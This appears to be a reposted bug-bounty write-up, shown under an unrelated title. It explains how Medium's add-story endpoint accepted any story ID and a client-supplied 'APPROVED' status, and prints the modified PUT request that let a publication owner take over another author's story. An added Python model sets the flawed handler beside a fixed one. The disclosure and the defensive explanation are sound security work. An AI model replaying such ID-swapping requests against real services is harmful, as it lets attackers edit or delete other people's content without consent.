Writing User Stories For System Requirements
Update and Delete any Story of any user on Medium
Summary: Medium's "Add story to publication" endpoint accepted any story ID in the PUT path and trusted a client-supplied {"postStatus":"APPROVED"}, so a publication owner could add another user's story to their publication without the author's consent and then edit or delete it. The author reported it to Medium, who fixed it and paid a $250 bounty, later raised to $350 for the two issues (bypassing the Request Story approval, and updating or deleting any story).
@ajdumanhug
Allan Jay Dumanhug, Founder & Chief Executive Officer
Before the end of this year, two well-known people were hacked: Mark Zuckerberg, CEO of Facebook, and Sundar Pichai, CEO of Google. I was thinking: what if it's time for me to hack Barack Obama? But I know that isn't easy.
So, I decided to use my big brain to think my way out!
Looking for a new angle, I found the "Request Story" button hiding behind the ellipsis ('more') icon.
But there's a problem. The author needs to approve my request to add their story to my publication, and that's absolutely impossible. Apparently, though, I can add my own story to my publication without further ado.
My goal here is to add any story of another user to my publication without their consent, and I did that using the "Add story to publication" button.
While adding my own story to my publication, I intercepted the HTTP request to modify the story ID.
My Story ID: 2a4b6810c12d
Story ID of the target: 1a3b579c101a
The HTTP Request:
PUT /testphzxc/2a4b6810c12d HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}
{"postStatus":"APPROVED"}
The request line with the PUT method carries the ID of my story as the last path segment. I remove that ID and put in the ID of the target's story.
Updated HTTP Request:
PUT /testphzxc/1a3b579c101a HTTP/1.1
Host: medium.com
Connection: keep-alive
Content-Length: 25
Accept: application/json
Origin: https://medium.com
X-XSRF-Token: {Redacted}
X-Obvious-CID: web
User-Agent: {Redacted}
Content-Type: application/json
Referer: {Redacted}
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8,nb;q=0.6
Cookie: {Redacted}
{"postStatus":"APPROVED"}
Of course, as mentioned above, the story is added to my publication automatically, without the author's consent. That is because of:
{"postStatus":"APPROVED"}
The server trusts this client-supplied status instead of forcing the Request Story path, where the story would stay pending until its author approves it, and it never checks that the story ID in the path belongs to the caller (an IDOR).
Then *poof*: the target's story was added to my publication.
Now what? Because the story was added to my publication, I am now able to edit or delete it.
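To make the two authorization mistakes concrete, here is an added example that is not Medium's code: an in-memory model of the PUT /<publication>/<story_id> handler, with the vulnerable behaviour beside a hardened version that derives the status server-side and keeps the Request Story approval with the author. The story IDs and the publication slug "testphzxc" are the ones quoted above; the user names "attacker" and "target", the class names and the function names are assumptions made for this example.

```python
# Added example, not Medium's code: an in-memory model of the
# PUT /<publication>/<story_id> "add story to publication" endpoint, with
# the vulnerable handler beside a hardened one.  The story IDs and the slug
# "testphzxc" are the ones from the post; the user names "attacker"/"target",
# the class names and the function names are assumptions for this example.
from dataclasses import dataclass, field


class Forbidden(Exception):
    """Raised when the caller is not allowed to perform the action."""


@dataclass
class Story:
    story_id: str
    author: str


@dataclass
class Publication:
    slug: str
    owner: str
    posts: dict = field(default_factory=dict)  # story_id -> "PENDING"/"APPROVED"


def new_state():
    """Constructed sample data: one story per user and one publication
    owned by the attacker. Returns a (stories, publications) pair."""
    stories = {
        "2a4b6810c12d": Story("2a4b6810c12d", "attacker"),  # my story
        "1a3b579c101a": Story("1a3b579c101a", "target"),    # target's story
    }
    pubs = {"testphzxc": Publication("testphzxc", "attacker")}
    return stories, pubs


def handle_put_vulnerable(state, session_user, slug, story_id, body):
    """Vulnerable handler: it checks that the caller owns the publication,
    but (1) never checks who wrote the story named in the URL (IDOR) and
    (2) copies postStatus straight out of the JSON body, so the caller can
    skip the author's approval by sending "APPROVED"."""
    stories, pubs = state
    pub = pubs[slug]
    if pub.owner != session_user:
        raise Forbidden("not the publication owner")
    story = stories[story_id]                       # any existing ID is accepted
    pub.posts[story.story_id] = body["postStatus"]  # client-controlled status
    return pub.posts[story.story_id]


def handle_put_fixed(state, session_user, slug, story_id, body):
    """Hardened handler: the status is derived on the server from who the
    caller is relative to the story's author; the body's postStatus is
    ignored. Adding someone else's story only creates a pending request."""
    stories, pubs = state
    pub = pubs[slug]
    if pub.owner != session_user:
        raise Forbidden("not the publication owner")
    story = stories[story_id]
    status = "APPROVED" if story.author == session_user else "PENDING"
    pub.posts[story.story_id] = status
    return status


def author_approves(state, session_user, slug, story_id):
    """Second half of the intended "Request Story" flow: only the story's
    author may turn a PENDING request into APPROVED."""
    stories, pubs = state
    pub = pubs[slug]
    if stories[story_id].author != session_user:
        raise Forbidden("only the author can approve a request")
    if pub.posts.get(story_id) != "PENDING":
        raise Forbidden("no pending request for this story")
    pub.posts[story_id] = "APPROVED"
    return "APPROVED"


def can_edit(state, session_user, story_id):
    """Edit/delete rights as the post describes them: the author always has
    them, and so does the owner of any publication where the story is
    APPROVED. A forged APPROVED status is therefore a takeover of the story."""
    stories, pubs = state
    if stories[story_id].author == session_user:
        return True
    return any(
        p.owner == session_user and p.posts.get(story_id) == "APPROVED"
        for p in pubs.values()
    )


if __name__ == "__main__":
    forged = {"postStatus": "APPROVED"}  # the body from the captured request
    state = new_state()
    print("vulnerable:", handle_put_vulnerable(state, "attacker", "testphzxc", "1a3b579c101a", forged),
          "/ attacker can edit:", can_edit(state, "attacker", "1a3b579c101a"))
    state = new_state()
    print("fixed:", handle_put_fixed(state, "attacker", "testphzxc", "1a3b579c101a", forged),
          "/ attacker can edit:", can_edit(state, "attacker", "1a3b579c101a"))
```

Replaying the captured request against the vulnerable handler gives the target's story an APPROVED status in the attacker's publication and, with it, edit and delete rights; against the hardened handler the same request only creates a PENDING entry that the target alone can approve. The design point is that "approved" is a fact about the author's consent, so it can only be set by the author's own action, never taken from a request body.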
Well, instead of attacking Mr. Obama's blog, I reported it to Medium.
They fixed it and rewarded me with a $250 bounty, but I wanted more because I found multiple bugs in my report: first, bypassing the Request Story approval, and second, updating and deleting any story. They then added $100 to the previous bounty, for a total of $350.
Tags
#medium #bug-bounty #idor #bypassing #hacking
Source: https://hackernoon.com/update-and-delete-any-story-of-any-user-on-medium-8b6a609c9bbe
Posted by: hillparented.blogspot.com